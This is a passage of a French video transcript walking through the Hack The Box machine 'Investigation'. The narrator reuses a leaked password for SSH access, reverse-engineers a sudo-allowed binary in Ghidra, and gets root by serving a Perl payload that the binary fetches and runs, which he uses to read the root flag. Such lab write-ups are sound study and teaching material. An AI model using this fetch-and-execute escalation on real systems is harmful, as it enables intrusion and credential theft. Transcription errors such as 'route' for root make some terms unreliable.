elle s'est plantée. Du coup, le compte d'ouverture a été considéré comme étant celui-là, et ça a été logué. Donc là, ça nous donne vraiment je pense que sur une machine avec de box comme ça, c'est un mot de passe qui peut être réutilisable. Donc on va l'utiliser, on va se retrouver sur la Linux et tenter de voir si ça correspond à l'utilisateur S. Morton. Allez, à tout de suite. Ok, on se retrouve sur notre machine et on va tenter de se connecter en SSH pour voir si l'utilisateur fonctionne bien. Alors là, on peut faire un SU, par exemple, SU S. Morton.
Alors je crois que la truc a craché, du coup ça va pas être possible, mais on va tenter de se connecter en SSH. Si on peut se connecter en SSH, c'est bénéf, parce que le shell, un reverse shell comme ça, c'est jamais très stable. Alors SSH, smorton, investigation.htb. Je tente de me connecter dessus, et j'ai eu un petit problème de VPN, je sais pas pourquoi. On retourne là avec le mot de passe qu'on avait trouvé directement, hop, default pass, on va tenter de se connecter. Et là, ça fonctionne. Ok, donc on est connecté en tant que Smorton. Et laisse tirer là, on a bien accès à son truc et on peut lire le flag route. Je ne vais pas le montrer, mais je crois que c'est pas identique à tout le monde, mais je vais quand même éviter de le montrer. Donc voilà, là on a accès à l'utilisateur. Maintenant, il faut trouver une façon de passer route. Donc on peut refaire un limpiz avec l'énumération classique. On peut aussi regarder les trucs de base, notre fameux sudo-l. Ok, donc là il a l'air de fonctionner. Et on voit que on peut, en tant que route, sans avoir besoin de spécifier un mot de passe, lancer le binaire qui s'appelle user bin binary. Ok, ça peut être intéressant. On peut voir aussi que quand on lance le sudo, donc quand on lancera le sudo machin binary, l'environnement est reset et on nous met un secure pass pour pas qu'on puisse modifier notre pass. Et l'environnement est reset de toute façon, donc on ne peut pas passer à une autre variable d'environnement. Pourquoi ils mettent ça? Parce que ça, si on n'avait pas ça et qu'on aurait pu modifier le path, si jamais dans le binaire il y avait un fichier qui était appelé sans son chemin absolu, donc avec son chemin relatif, par exemple l'exécutable date, et bien en fait on aurait pu le remplacer par exemple un slash bin slash bash pour le lancer en tant que route avec un SUID et le rename date ou date pour qu'il soit run au niveau du binary mais avec d'autres droits et qui exécute d'autres commandes pour pouvoir passer route. Là en l'occurrence c'est pas possible. Donc on va aller voir au niveau de ce binary, ls-là, dessus, quel droit on a. Ok, donc on ne peut pas le modifier, mais de toute façon c'est un binaire. Si on fait un cat, peut-être qu'on peut voir les informations dedans. Non, ok. Si on fait un file dessus, est-ce qu'on a des informations? On voit que c'est un binaire ELF 64 bits, donc du Linux classique. Ok. Peut-être qu'en faisant un strings dessus, on peut avoir des informations. Ok, c'est pas ça que je voulais faire. Strings dessus, on peut avoir quand même des informations intéressantes. Donc là, on peut voir qu'on a les différentes sections. Ok, ça ne nous intéresse pas. Là, on voit binary.c, mais on n'y a pas accès, on n'a pas accès au fichier source. Ici, on a des curl easy. Ok, donc ça a l'air d'utiliser une librairie curl. Ça peut être intéressant. Ici, on a un exit. On a quelque chose qui pourrait s'apparenter à un mot de passe. Running. Donc là, c'est toutes les strings qui sont utilisées au niveau du binaire. Running, ok. Perl. Donc il y a un script Perl qui peut être exécuté. Et il y a une commande rm-f pour supprimer le fichier qui s'appelle lsd, enfin ldn machin bidule. Ok. Donc là, on n'a pas trop d'informations. Ok. Donc là, maintenant on est là. Si on tente on peut tenter de l'exécuter pour voir ce que ça donne. Non, pas du tout. Si je tente d'exécuter user bin binary, user bin binary, permission denied. Effectivement, on doit utiliser le sudo devant. Si je fais sudo ça, exiting. Ok, donc on a vu que exiting c'était ici, mais normalement on devrait avoir un running, sauf que là on l'a pas. Donc c'est qu'il nous manque des informations. Si on tente, par exemple, de mettre un truc aléatoire, test, exiting, il se passe rien non plus. Là, notre seule possibilité, c'est de faire du reverse engineering et d'essayer de comprendre comment fonctionne le binaire pour voir ce qu'il attend, comment il fonctionne et ce qu'il attend au niveau des paramètres et comment on peut les utiliser. Donc on se retrouve tout de suite une fois que ce sera lancé. Donc, comme vous pouvez voir, j'utilise l'outil Ghidra, ou Ghidra, ou je sais pas comment on appelle ça, pour pouvoir faire du reverse. Donc je l'ai importé au niveau d'un projet actif et je le lance. Alors Ghidra, de mémoire, je crois que c'était l'outil qui avait été donné enfin qui avait été mis open source par la NSA. Donc voilà. Le temps que ça charge, il y a une analyse après qui va être faite pour le décompiler. Alors pourquoi j'utilise Ghidra et pas IDEA Pro ou autre? Parce que déjà IDEA Pro c'est payant, et même si on utilise la version gratuite, il n'y a pas de décompiler qui est intégré dedans.
Après, on peut en utiliser plusieurs qui sont online directement, mais je préfère faire directement en local sur ma machine. Donc là, oui, on l'analyse pour que ça puisse décompiler toutes les fonctions, tout ce qui nous intéresse, et on va ensuite pouvoir aller les visualiser. Donc celle qui nous intéresse principalement, c'est la main. Là, on peut voir qu'il y a bien du curl qui a été utilisé. On va attendre que l'analyse se termine, qu'on puisse avoir accès au main. Là. Là, si on va dessus, on peut voir le main. Donc, ce qui nous intéresse, c'est la partie de droite. Donc ici, vous voyez, c'est pas exactement du C. Pour ceux qui n'ont jamais fait de reverse engineering, c'est des actions qui ont été récupérées. Donc ça a été reconstruit. Le main a été reconstruit par rapport à toutes les instructions qu'ils ont retrouvées au niveau de l'assembleur. Donc on peut voir que il a été renommé, certaines chaînes ont été renommées de manière, enfin certaines variables ont été renommées de manière, on va dire, plus intelligente. On peut voir les strings, les machins qui sont utilisés, mais c'est pas encore tout à fait correct. Donc qu'est-ce qu'on va faire? On va pouvoir modifier un peu pour essayer de comprendre. Alors évidemment, si vous n'avez aucune connaissance en langage C, ça va être compliqué de comprendre, mais en l'occurrence ici ça va à peu près, c'est pas un code qui est vraiment très compliqué. Donc comment ça se passe? On a le main, donc le main qui prend param 1, param 2. En fait, param 1, qu'est-ce que c'est? C'est le nombre d'arguments, et param 2, c'est un tableau des arguments. Donc là, ils ont mis longue, mais en fait, c'est par exemple un char étoile. Donc ici, qu'est-ce qu'on peut faire? On peut rename la variable. Par exemple, ici, c'est nombre param. Ou je vais mettre count param. En fait, c'est le argc, mais voilà. En fait, on peut rename pour que ce soit beaucoup plus lisible. Et là, c'est param array, par exemple. Ok, donc là, c'est un int file. Donc, c'est un pointeur sur un type file. Donc, en fait, c'est un file handler. Ce qui va contenir notre fichier. Ok. Là, on ne sait pas encore ce que c'est, donc on ne peut pas encore modifier. Alors, on a un premier if qui regarde si le nombre de paramètres qu'on a donné au niveau du fichier est différent de 3. Si c'est différent de 3, on quitte. Ok. Donc là, en l'occurrence, nous, quand on l'avait testé ici, on avait donné quelque chose qui était différent de 3, parce qu'on en avait que 2. On avait le premier qui est toujours le nom du binaire qu'on appelle, et un deuxième qui est test. Donc là, il y a un exiting. Si on tente d'en mettre un autre, par exemple test, ça marche pas non plus. Ok. Pourquoi? On va voir ça. Parce qu'ensuite, c'est pas le seul test qu'il y a un autre test qui stocke getUID, enfin le résultat de la commande getUID dans la variable qui s'appelle var1, et qui teste si var1 est différent de 0. Donc en fait, là, on peut voir que getUID, ça récupère l'ID de l'utilisateur, user ID. Il regarde si le user ID est différent de 0. Si c'est le cas, on quitte. Pourquoi il fait ça? Parce qu'en fait, un user ID égale à 0, ça veut dire qu'on est utilisateur root. Si on va voir dans notre fichier 4 etc passwd, ici, voilà, le user ID est égal à 0. Donc en fait, qu'est-ce qu'il check? Si on n'est pas root, on quitte. Ok? Donc, il faut exécuter la commande, enfin le binaire avec 3 paramètres en étant root. Et ensuite, on a ça encore, ok? Donc var1, qu'est-ce que c'est? En fait, c'est un int, et c'est le résultat du strcomp. On peut rename ça result. Donc qu'est-ce qu'il va faire? Il va comparer la chaîne de caractères LDN machin bidule avec un paramètre qu'on aura passé. Alors ici, attention, ici on peut voir qu'en fait ça, qu'est-ce que c'est? C'est de l'hexadécimal. Hexadécimal. Alors si vous ne savez pas comment convertir, vous allez directement sur internet, vous tapez hexdec, donc hexadécimal to décimal pour faire de la conversion. Il y a des sites en ligne qui vous permettent de faire ça assez rapidement. Donc ici par exemple, on a un fichier hexadécimal, enfin un nombre hexadécimal qui est de 10, enfin 1, 0. Si on le rentre ici et qu'on fait convert, on peut voir que ça nous... En fait, ça vaut 16 en décimal. D'accord. Donc là, qu'est-ce que ça fait? En fait, ça va comparer une valeur de notre tableau qu'on a passé en paramètres. Le tableau, en fait, c'est juste nos arguments qu'on a passés au binaire. Et on va ajouter dessus 16. Alors, qu'est-ce que c'est? C'est qu'en fait, un tableau en C, c'est juste un pointeur. Un pointeur sur le premier élément.
Ici, quand on fait un plus au niveau d'un pointeur, qu'est-ce qu'on va faire? On va juste déplacer le pointeur. C'est-à-dire qu'en fait, param arrêt, de base, il pointe vers notre premier élément. Donc si, en l'occurrence, là par exemple, on a fait test 1, test 2, param arrêt de base, donc le pointeur vers param arrêt, il pointe vers test 1. Quand on rajoute quelque chose, on va faire avancer le pointeur à droite. Donc là, en l'occurrence, on rajoute 16. Pourquoi 16? Parce qu'ici, c'est de type long. Si on était en int, on aurait dû faire un plus 4. Je sais plus exactement, je suis pas très bon en assembleur. Mais en gros, là, on va dire qu'on va passer à l'élément suivant du tableau. Donc en fait, on va passer au deuxième. Donc on va comparer le deuxième élément du tableau, donc notre troisième argument qui est en fait notre deuxième argument, avec cette chaîne de caractères-là. Si c'est pas le cas, donc si les deux ne sont pas identiques, on quitte. Et sinon, on peut enfin lancer un run. Donc on va tester ça. On sait qu'on doit avoir 3 arguments. 1, 2, 3. Donc là, c'est bon. On sait que le premier, pour l'instant, le premier, on s'en fout de ce que c'est. Il n'y a pas d'importance, il ne check pas. Mais il faut que le troisième argument, donc au lieu du test 2, ce soit celui-ci. La chaîne de caractères LDN, machin bidule. Donc on va copier, on va coller. Et là, on a enfin le running. Donc on a passé toutes les premières vérifications. Donc on a passé le if là, le if là et le if là. Maintenant, la partie la plus intéressante et la plus grosse, c'est ici. Alors, première instruction, file handler. Ça va ouvrir un fichier en écriture binaire, donc write. Et le fichier, il aura pour nom le deuxième paramètre. Donc c'est le même que celui-là. Le deuxième paramètre qu'on aura donné. Donc en fait, il va ouvrir un fichier qui sera nommé ldnx machin bidule. Ok. Une fois qu'il l'a ouvert, il va setup un curl easy init. Si on ne sait pas ce que c'est, internet curl easy init c. Ok. Lib curl easy init. On peut voir ce que fait la fonction, ce que nous retourne la fonction et les paramètres qu'elle peut prendre. Donc curl machin bidule, donc ça nous renvoie un pointeur vers curl. Ok, donc en fait, pareil encore une fois, c'est un handler. Exactement pareil que pour notre fichier. File handler, ici on peut mettre par exemple rename variable curl handler. Donc ça nous enlève déjà pas mal d'inconnus. Donc on fait un curl easy init pour l'initialiser. Et ensuite on va appeler curl easy set opt sur notre handler avec un paramètre qui est encore de l'hexadécimal mais on ne sait pas à quoi ça correspond. Et cette fois-ci on peut voir que c'est param 8 qui va être passé au niveau de cet argument-là de curl easy set opt. Sauf que c'est plus 8 et pas plus 16. Donc plus 16 c'est notre deuxième élément, plus 8 c'est notre premier. Donc là on sait enfin que notre premier élément ici, il sera utile pour ça. On ne sait pas encore à quoi il sera utilisé, mais on sait qu'il est utile. Maintenant qu'on sait ça, si on retourne dessus, donc il y a encore un autre, un autre paramètre qui est passé, qui est le même que le deuxième, qui est de l'hexadécimal, mais on ne sait pas ce que c'est. Ensuite, on a un autre set opt, encore un autre hexadécimal, on passe le file handler et le dernier qui est exactement pareil que le deuxième. Et ensuite, on rappelle encore cet opt avec un autre argument. Si on va voir à quoi correspond curl easy set opt, hop, ici, curl easy set opt c, qu'est-ce qu'on peut voir? Donc on se retrouve toujours sur le même site. Ça nous permet de set des options pour un handle curl. Ça, c'est ce qui nous intéresse. Ok, donc quels arguments ça prend? Ça prend le handle, on a trouvé juste ici, curl handler. Ça prend une option de curl, et ça prend un paramètre. Donc là, le problème, c'est que nous, on en a 4. 1, 2, 3, 4 à chaque fois. Le dernier, c'est pareil que le deuxième, donc je pense qu'on peut l'ignorer, ça n'a pas d'importance. Ici, on peut voir que pour le premier, l'option curl qui nous donne, c'est de l'hexadécimal. Si on convertit l'hexadécimal là en décimal, on obtient 1002. Ok, on obtient 1002. Ici, c'est 1 de moins, donc on obtiendra... enfin, 1002, non, c'est 10 002. Ici, on obtient 1 de moins, donc ce serait 10 001. Et 2D, le dernier, 2D, à quoi ça correspond? 2D, ça correspond à 45. Ok. Donc là, on sait qu'on passe des valeurs numériques, sauf que le problème, c'est qu'ici, si on va voir sur la documentation,
le problème, c'est qu'on, voilà, toutes les options, curl OPT, machin, on peut voir que, en fait, c'est des chaînes de caractères, ce n'est pas des... donc, si on prend le premier, verbose, quand on passe ici, c'est une chaîne de caractères, ce n'est pas un int. Ce n'est pas une donnée décimale, vous voyez. Donc là, le problème, c'est que maintenant, faut trouver au niveau de la librairie la correspondance entre le nom et l'int qui est associé. Comment faire ça? Alors, soit on peut directement taper dans le code source, soit moi, j'avais trouvé un site. Alors, attendez, il faut que je retrouve. Ok, j'ai plus le site. Bon, on va le faire à la manière dure. On va tourner sur le fichier curl en C. Enfin, là, du coup, c'est le header, donc .h. Et on a, je sais plus combien, 2000 ou 3000 lignes. Donc, on va s'amuser, ça va être sympa. Mais vous verrez qu'en fait, c'est assez simple de trouver ça. Alors, bon, où chercher, sachant qu'on a 3200 lignes, ça va être compliqué. La première étape que j'ai essayé de faire, c'est de chercher directement le nombre hexadécimal. Par exemple, 2712. Peut-être qu'on peut le trouver directement dans le fichier sans avoir besoin de chercher. Si on CTRL F et qu'on cherche, on a bien notre fichier, enfin notre numéro de ligne 2712, mais ça, on s'en fout, c'est pas ça qu'on veut. Donc, c'est-à-dire que la valeur hexadécimale n'est pas précisée ici. Ok. Peut-être qu'on peut tenter avec la valeur décimale qui est associée à ça, qui est 10 002. 10 002. On l'a pas. Là, en l'occurrence, on a quelque chose qui peut ressembler à du 10 000, mais ça ne nous intéresse pas, on a 7 matchs. Donc si on va chercher ça, on a une version de BSD, on s'en fout. On a curl progress function, on s'en fout. Ça, on s'en fout. C'est de l'hexadécimal, on s'en tape. Là, on a curl opt type object point qui est égal à 10 000. Ça peut être intéressant. Maintenant, si on cherche par exemple curl opt verbose, peut-être qu'on peut voir la valeur qui est associée à curl opt verbose. Donc si on cherche directement cette valeur-là, CTRL V, ok. Donc là, ça nous dit ce que ça fait. Donc verbose, évidemment, ça fait que ça parle plus au niveau des sorties. Donc c'est une fonction curl-opt qui est appelée, qui est passée en paramètre dedans, curl-opt verbose, curl-opt type long et 41. D'accord, ça ne nous intéresse pas énormément plus, mais là on a un curl-opt au niveau d'une fonction, on peut aller voir ce qu'elle fait. Alors il y a beaucoup de matchs, mais si on retourne tout en haut, voilà, on peut voir curl-opt, ça prend NA qui est égal à T plus NU. Donc en fait, la première valeur est égale à la deuxième plus la dernière. Donc là, le write data, donc ce qu'on stocke dans le write data, donc en fait ici, par exemple, la variable, c'est égal à la valeur de ça plus le dernier. Ici, si on regarde, qu'est-ce que curl opt type cb point, CTRL F de ça, on peut remonter. On a un define de cette variable, la fameuse variable curl opt type cb point, qui est elle-même égale à object point. Et si du coup on regarde cet object point, alors mince, je me suis planté, object point, et qu'on remonte, hop, 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 tout en haut, on voit que object point c'est égal à 10 000. Ah, ça commence à nous intéresser. Là on a un 10 000, et on avait vu que notre fameuse conversion de 2712 ou 2711, c'était du 10 002. Ça commence à être vraiment intéressant. Donc en fait, pour l'OPT write data, c'est ceci qui est égal à ceci, qui est en fait égal à ceci. Donc, curl opt write data, c'est 1000, enfin 10 000 plus 1. Donc on sait que curl opt write data, c'est 10 000 plus 1, donc 10 001. On sait que nous, ici on a quelque chose qui nous intéresse, qui est le 2711 en hexadécimal. Si on le convertit directement en décimal, on a du 10 001. Ah, ça pourrait correspondre. Donc on pourrait se dire que notre deuxième, c'est du write data. Si on regarde ce que fait notre fameux write data, on va sur la documentation officielle. Donc, à mon avis, ça écrit de la donnée dans un fichier, dans un truc comme ça. Qu'est-ce que ça prend en paramètre? Ça prend le fameux curl handle,
l'option et un pointeur. Si on retourne ici, on a bien notre curl handler, l'option et le handler. Le handler, c'est le handler du fichier dans lequel on doit écrire. Donc ça pourrait vraiment correspondre à ça. Voilà, par default, this is the file machin to stdout. Ok. Donc ça pourrait correspondre. Si on continue, on regarde, en fait, là, c'est 10.002. Donc si on retourne dans la documentation office, enfin, dans le code source, on peut voir qu'en fait, c'est curl opt URL, qui est égal à str string point. Alors, c'est pas le même. On peut voir à quoi ça correspond celui-ci. String point, si on remonte. String point, ça correspond à object point, qui est le même type que ça. Donc, object point, c'est aussi du 10.000. Donc, c'est bien 10.002. 10.002 qui pourrait correspondre à curl opt URL. Si on va voir à quoi correspond curl opt URL, curl opt URL, on va dessus, on peut voir que ça prend toujours le handle, l'option et un char étoile, donc une string, qui est l'URL. Ok. En fonction de notre code source, enfin du truc qui a été décompilé, du code décompilé, on peut voir notre fameux handler, notre fameuse option, et derrière, on a le paramètre qu'on a passé. Donc, ok, ça set l'option. L'URL, c'est en fait l'URL qu'on va passer au niveau du nom de fichier, enfin au niveau du paramètre. Donc, ici, alors ça crash, je ne sais pas pourquoi. Ah oui, je crois que c'est des fois c'est chiant, c'est mon Firefox qui. Ok, c'est bon. Ici, en fait, le deuxième paramètre, ça va être une URL. Par exemple, http google.fr. Ok. On avance, on continue. Donc là, on sait que c'est l'URL. Là, on sait que c'est le fichier qui va écrire des données dedans. Et le 2D, qu'est-ce que c'est le 2D? 2D, on voit que c'est 45. On a vu que c'était 45. On peut revérifier. Convert 2D 45. Ok. Là, si on va au niveau du 45, on a l'air de voir que c'est un curl opt fail on error. Mais le problème, c'est que nous, là, on n'a que un 45, alors que les autres, c'était du 10 000 quelque chose. C'est bizarre quand même. Donc on peut quand même vérifier le type. Donc là, c'est curl type long 45. Donc c'est ça plus ça qui doit être égal à 45. Si on va chercher, encore une fois, au niveau de ce qui a été écrit, curl type long, en fait, c'est le type de base qui est égal à 0. Donc 0 plus 45 égale 45. Donc on était bien sur le bon truc. Hop, 45. Donc c'est bien que ici, on va c'est une option qui est fail on error. On peut vérifier ce que ça fait directement ici. C'est la documentation officielle. Fails on machin. En gros, si on a une erreur 400 et quelques, ça renvoie une erreur de requête. Bon, classique. Ok, maintenant, on a toutes les options qui ont été set. Donc on sait qu'on va aller request une URL qu'on aura passée en paramètre, qu'on va écrire le résultat de ce qui est retourné via cette URL dans notre fichier qui s'appelle ldnx. Ensuite, donc là, encore on stocke dans la fonction, dans la variable result. Donc on lance notre curl. Si le résultat est égal à 0, donc si la requête a réussi, alors en tout cas, dans le cas où elle n'a pas réussi, juste on quitte. Dans le cas où elle a réussi, qu'est-ce qu'on va faire? On va copier le nombre de caractères. Alors snprintf, donc notre deuxième champ, malloc. Donc là, on va faire un malloc de quelque chose, d'une string, du nombre, enfin de résultat plus 1, de résulte plus 1. Résulte, du coup, c'est la taille de la chaîne de caractères. Ok. On fait la même chose, mais pour ceci. Même taille de caractère. Et là, par contre, on a un... Ah non, c'est pas la même. Là, le malloc qu'on fait, c'est par rapport à la taille de cette chaîne-là. Et on peut voir qu'à la fin, on colle système de cette chaîne-là. Donc celle-là qui se base sur celle-là, qui se base sur notre nom de fichier. Ok. Donc on sait que ça, en fait, c'est la commande à exécuter. Donc on peut rename command to execute. Ok. Bon, là on n'est pas trop mal. Il y a encore le premier S qui est
en fait, je crois que c'est le nom de fichier. Alors, je ne sais plus exactement, je vais retourner dans mes notes que j'avais prises. Le premier S, qu'est-ce que c'est en fait? C'est... Ah oui, c'est le nom du fichier Perl. Hop. Perl file. Parce qu'ici, on va récupérer la taille du fichier ici. On va le malloc. On va stocker dedans. Non, on va retrouver la taille. Alors là, j'ai du mal. Hein. Je vous avoue que je sais plus exactement comment j'avais fait ça, mais bon, bref. Mais ce qui est important de savoir, c'est que en fait, on va récupérer la valeur de notre fichier Perl et qu'on va tenter de l'exécuter. Ensuite, on le supprime et on return. Donc maintenant, on a à peu près la globalité de notre main qui a été reconstruit. Donc on va pouvoir tenter certaines choses. Alors, en l'occurrence, celui-là, on est obligé de laisser là. Parce que c'est celui de base. Ça, c'est une URL. Ok. Si on peut tenter quelque chose de simple, alors je vais me rendre dans CD documents, hack de box, investigation. Si je fais un Python 3 m http.server, genre un serveur classique HTTP3. Si ici je tente par exemple mon URL, je fais http 10.10.14.2 sur le port 8000 du fichier test.txt. Qu'est-ce qui se passe? Ok, donc on a un running, on a un exiting, et là on peut voir qu'on a bien quelque chose qui a tenté d'accéder à ça, donc test.txt. Donc ça fonctionne. Préciser l'URL va bien faire en sorte d'accéder directement à ce qu'on a spécifié. Si on fait un ls, on a le contenu, donc ça n'a pas été supprimé. Si je cadre son contenu, il ne se passe rien. Si maintenant, par exemple, je fais un nano de test.txt, où dedans je fais un hello world. Si je relance le même, que je relance exactement la même commande, là, ça nous met une erreur en mode quand locality object method hello via package world at machin. Donc le fichier là est bien exécuté. Donc ça veut dire que la commande, donc le binaire, va bien aller chercher le contenu de l'URL que j'aurais spécifié. Il va le stocker dans le fichier LDNX et on va exécuter le fichier LDNX. On a vu que l'exécution du fichier se faisait via Perl. Donc on peut se dire peut-être que en fait dans mon fichier test.txt, il faut que je mette du code Perl. On peut tenter ça. Parce que là, apparemment, il a tenté d'exécuter Hello World, mais il ne comprend pas. Parce qu'effectivement, Hello World en Perl, ça n'existe pas. Alors, il y a plusieurs façons de faire. On peut tenter, par exemple, nano test. Attends, pourquoi je peux plus text.txt? Text.txt. Il n'existe plus. Attends, il a été supprimé. Qu'est-ce qui se passe? ls-là. Nano. Non, parce que j'avais... Attends. Ah oui, j'ai mis text.txt. Ok. Bon. Si par exemple, on peut aller voir sur internet, Perl execute system command. Voir comment faire pour exécuter une commande sur le système. Comment je peux coller un truc. Donc là, apparemment, on voit qu'il utilise la commande system. On peut tenter ça. Si je fais system touch, alors, par exemple, system, donc on exécute la commande ID et on la stocke dans /tmp/id. Par exemple, hop, on vérifie que c'est bien comme ça. Système, la commande à exécuter, point virgule, machin. Normalement, il n'y a rien besoin d'include au niveau des modules et des trucs comme ça. On peut tenter comme ça, ok. Maintenant, je me remets en Python HTTP server. Je réexécute ceci. Paf, running. Ça a bien cherché. On peut voir si ça a créé quelque chose dans cat/tmp/id. Ah, dans tmp/id, on a bien un fichier qui a été créé parce qu'on a spécifié dans notre fichier test.txt dès que celui qui lançait le binaire, donc en l'occurrence la sudo, donc root, écrive son ID et qu'il le redirige
vers le TMP ID. Donc là, c'est bien exécuté en tant que route. Donc maintenant, bah, on a exécuté en fait une commande en tant que route. Ce qu'on peut faire, c'est soit avoir un reverse shell en tant que route. Donc là, on a pété la machine, on a fini. Moi, en l'occurrence, j'ai pas besoin d'avoir un reverse shell, ça m'intéresse pas. J'ai juste besoin d'avoir le flag. Comment faire pour avoir le flag? On refait exactement pareil. cat/route/route.txt. Alors, on sait où se situe le flag, hein, dans les hacks de box, toujours route.txt. Si là, on ne savait pas, bah, on aurait pu directement avoir un reverse shell, aller chercher manuellement sur la machine. Et on redirecte cette sortie de fichier, donc qui sera notre flag, vers tp, par exemple, flag, /tmp/flag. Ok, on a ça, paf paf. Là, on peut vérifier ls-la/tmp/flag.txt. Ça n'existe pas. Donc si on met en écoute sur notre serveur, ici, on va réexécuter le binaire. On va dire tu vas accéder à ce fichier-là, écris le résultat dans LDNX et tu l'exécutes. Ok. Si on refait un ls-la flag, on a bien notre flag qui contient, enfin qui est contenu dedans, et du coup on a réussi la machine, on l'a terminé. Alors attendez, je ne sais pas si non, le fichier a bien été supprimé, c'est-à-dire qu'il a bien été exécuté, donc on n'est plus à ça. Voilà, donc cette vidéo aurait été un peu longue, mais j'espère qu'au moins vous aurez appris des trucs. Cette box était vraiment pas mal, on a appris pas mal de choses, on a fait du reverse à la fin. On n'en fait pas souvent sur les box, enfin sur les box de type boot to route, donc c'est vraiment sympa. N'hésitez pas à me dire ce que vous en avez pensé de la vidéo, à me dire également à laisser un petit pouce bleu si elle vous a plu, et à vous abonner pour être au courant des prochaines vidéos. Allez, on se dit à la prochaine, bye bye.